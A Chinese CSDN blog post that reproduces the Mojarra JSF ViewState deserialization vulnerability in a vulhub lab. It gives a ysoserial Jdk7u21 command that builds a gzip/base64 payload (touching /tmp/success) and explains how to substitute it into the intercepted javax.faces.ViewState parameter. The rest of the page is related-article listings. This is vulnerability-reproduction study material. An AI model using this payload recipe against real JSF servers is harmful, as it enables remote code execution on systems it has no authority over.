Mojarra JSF ViewState 反序列化漏洞

最新推荐文章于 2024-08-28 09:00:00 发布
最新推荐文章于 2024-08-28 09:00:00 发布
阅读量766 收藏
点赞数
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/EC_Carrot/article/details/118693392
版权
本文介绍了如何使用ysoserial工具生成特定payload,结合vulhub环境,通过修改javax.faces.ViewState的值来复现JDK7u21的漏洞。实验中涉及网络抓包、URL编码以及查看容器内的结果验证漏洞是否成功利用。
摘要由CSDN通过智能技术生成

漏洞复现

我们使用ysoserial的Jdk7u21利用链来生成一段payload:

java -jar ysoserial.jar Jdk7u21 "touch /tmp/success" | gzip | base64 -w 0

在这里插入图片描述
我这里用的是vulhub的环境,访问your_ip:8080可以看到demo页面
在这里插入图片描述
抓包后修改javax.faces.ViewState的值为payload,payload记得要url编码
在这里插入图片描述
返回容器查看
在这里插入图片描述

小 白 萝 卜
关注
专栏目录
Mojarra JSF ViewState 反序列化漏洞复现
0xSec
01-10 1882
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中最常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
H3C IMC智能管理中心selfservice/login.jsf接口存在远程命令执行漏洞 附POC
nnn2188185的博客
08-12 243
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发H3C智能管理中心(intelligence Management Center,iMC)平台(以下简称iMC平台)为用户提供了实用、易用的网络管理功能。
Java安全之Mojarra JSF反序列化
Ly768768的博客
04-26 1506
JavaServer Faces,新一代的Java Web应用技术标准,吸收了很多Java Servlet以及其他的Web应用框架的特性。JSF为Web应用开发定义了一个事件驱动的、基于组件的模型。其中常用的是Sun(现在的Oracle)发布的Mojarra和Apache发布的MyFacesJavaServerFaces(JSF)概念在几年前就已经引入,现在主要在J2EE中使用。
深入解析 ASP.NET 的 ViewState 反序列化漏洞
最新发布
qq_33163046的博客
08-28 2150
在本文中,我们深入探讨了 ASP.NET 中的 ViewState 反序列化漏洞,包括其原理、如何验证漏洞的存在、以及如何修复漏洞。通过全面理解该漏洞的工作机制,我们可以更加有效地保护应用程序免受攻击。ViewState 反序列化漏洞原理ViewState 通过 Base64 编码,将页面和控件的状态信息传递给客户端和服务器。如果 ViewState 未加密或未正确签名,攻击者可以篡改 ViewState 数据并执行恶意代码。验证漏洞存在。
ASP.NET在ViewState反序列化利用
qq_43571759的博客
10-04 2100
ASP.NET在ViewState反序列化利用 做项目学到一手记录下 viewstate是什么 按键名称存储每个控件的值,如哈希表 跟踪对视图状态值的初始状态的更改 序列化和取消序列化保存的数据到客户端上的隐藏窗体字段 自动恢复回贴的 ViewState 数据 ASP.NET 支持三种不同的开发模式: Web Pages(Web 页面)、MVC(Model View Controller 模型-视图-控制器)、Web Forms(Web 窗体)基于 web forms ,目的是为服务端控件状态进行持
JSF 2.0 (Mojarra 2.0.2-FCS)
10-11
放一下lib在这里,供学习JSF 2.0的朋友们下载,免得大家跑到国外去下载
glassfish 如何更新 mojarra JSF實作1
08-08
### GlassFish 更新 Mojarra JSF 实现方法详解 #### 一、MojarraJSF简介 在深入了解如何更新GlassFish服务器上的Mojarra JSF实现之前,我们需要先了解几个概念。 - **Mojarra**:Mojarra是JavaServer Faces ...
Mojarra JSF2.0库文件
04-10
Mojarra JSF 2.0是针对JSF 2.0规范的实现库,包含了处理JSF生命周期、渲染组件以及与其他Java EE技术集成所需的所有类和接口。将Mojarra JSF 2.0库文件放置在Web应用的`WEB-INF/lib`目录下,是为了让应用服务器能够...
mojarra_web项目需要的包_jsf-impl.jar_
09-29
在实际开发中,Mojarra与`jsf-api.jar` 一起使用,为开发者提供了一个完整的JSF 2.0运行环境。 **使用JSF构建Web项目** 在Web项目中,将`jsf-api.jar` 和 `jsf-impl.jar` 添加到项目的类路径中,就可以开始使用JSF...
C#强化系列文章一:ViewState使用兼谈序列化
weixin_33695450的博客
11-20 171
ViewState的使用比较简单,一两句话就可以了。 赋值:ViewState[key] = value; 取值:value = ViewState[key]; 最主要的作用就是可以在当前页面保存值,ASP.NET的页面状态维护就是使用ViewState来实现的,基本上每一个ASPX页面都可以看到如下类似的html代码: <input type="hidden" name="__...
Hibernate及JSF框架漏洞
小小猪的博客
08-18 1395
Hibernate框架漏洞 Hibernate框架中的HQL注入漏洞 Hibernate是一种ORMapping框架,内部可以使用原生SQL还有HQL语言进行SQL操作。 所谓的HQL注入,就是指在Hibernate中没有对数据进行有效的验证导致恶意数据进入应用程序中造成的。 请看这段代码: Input参数即可造成注入。 不过在Hibernate中,一般都是在createQuery中使用PDO,使用setString填充占位符进行sql语句的拼接,如果是这样的话,自然就不存在SQL注入.
java 反序列化漏洞
weixin_33850890的博客
02-08 58
2019独角兽企业重金招聘Python工程师标准>>> ...
Padding Oracle漏洞影响JSF、Ruby on Rails及ASP.NET
啊啊啊啊2
10-09 176
恶意用户能够使用Padding Oracle(PO)攻击方式来解密cookie,加密状态及认证密码等关键信息。据Juliano Rizzo和Thai Duong所说,这个安全漏洞影响JavaServer Faces、Ruby on Rails、ASP.NET及其他一些技术及平台。\u0026#xD;\n在瑞士联邦理工大学(Swiss Federal Institute of Technologie...
Java 反序列化漏洞
qq_61553520的博客
05-24 5427
在各种编程语言的反序列化漏洞中,Java是最引人瞩目的,因为Java的开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
京东JSF序列化问题
09-21 604
早上来上班,突然值班群里有人报问题,说店铺属性在JD App前端显示错乱了。打开App,点开一个店铺查看,问题复现。打开内部店铺信息查询系统,发现查出来的属性确实有一部分错乱了。OMG~线上bug来了。查看JONE系统,发现昨晚有人加班上线了新功能,甭问,肯定是这次上线造成的问题。尝试回滚一台线上机器,问题解决。来吧,全量回滚吧!悲催的绩效啊~
java jsf 开源_JSF 标准的开源实现 Mojarra 已转移至 Eclipse 基金会
weixin_36322275的博客
02-16 165
Mojarra 项目负责人 Arjan Tijms 在邮件中 宣布 ,Mojarra 项目已成功转移到了 Eclipse EE4J,代码托管在 GitHub 上( https://github.com/eclipse-ee4j/mojarra )。Mojarra 目前的版本被设置为 2.3.3.99,原因是 master 分支与 Mojarra 2.3.3 保持同步。在转移过程中,2.3 滚动分支...
mojarra_2.0.0-Beta1版本项目必备:jsf-api与jsf-impl
资源摘要信息:"在进行Java Web项目开发时,特别是涉及到JavaServer Faces (JSF) 技术时,mojarra-web项目需要的包中的jsf-impl.jar文件是关键组件之一。JSF是Java EE平台的一部分,提供了一种模型-视图-控制器(MVC...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值